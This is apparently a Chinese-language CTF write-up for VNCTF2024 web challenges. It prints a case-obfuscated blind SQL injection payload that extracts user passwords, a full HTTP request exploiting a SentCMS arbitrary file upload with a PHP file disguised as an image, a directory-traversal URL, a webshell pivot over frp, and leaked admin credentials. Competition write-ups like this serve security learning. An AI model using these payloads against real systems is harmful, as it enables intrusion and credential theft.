VNCTF2024-WP
没啥时间打了,简单看了一下这次VNCTF,质量还是挺高的,有的没看的题等有师傅发WP再复现看看。
直接找这种类型语句就行
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 4 fOr 1))))in(105))),1,0))#
97 98 109 105 110 95 111 64 115 115 119 48 114 100
VNCTF{admin_p@ssw0rd}
第五个写出来,刚开始没看这题,害
是西湖论剑初赛原题,只是放到内网,外网不能直接访问到,本来想着是msf搭建代理,但是不行,后边换成frp就可以了
然后访问根据泄露的数据库密码连接,发现连不上
然后灵机一动,我已经通过SSH有shell了,我直接写个马用蚁剑连,然后也巧合,题目flag只是ctf用户没权限,我写马是www-data权限,就直接读flag了
vnctf{6aec435f-9543-46b1-8f62-370abea0f615}
VNCTF{W31c0m3_t0_VNCTF_2024_g@od_J0B!!!}
Sentcms任意文件上传漏洞,注册登陆之后上传恶意文件即可
POST /user/upload/upload HTTP/1.1
Host: adcfa8dc-c331-4ea0-b485-9fa3fd9ad107.vnctf2024.manqiu.top
Cookie: PHPSESSID=83dc5e96502c083ca5441c535463f46c
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"
WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"
test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"
image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"
164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg
JFIF
<?php phpinfo();?>
------WebKitFormBoundaryrhx2kYAMYDqoTThz--
访问phpinfo得到flag
vnctf{fbf0c81b-58a6-47f0-a556-f535c17e3b24}
目录穿越可以查看flag
http://manqiu.top:20533/#/../../..//flag/flag
找到管理员账密
admin:gdgm.edu.cn@M1n9K1n9P@as
文件可以通过重命名跨目录移动
../../../home/ming/share_main/f
VNCTF{564e406840636b3156315f6764676d}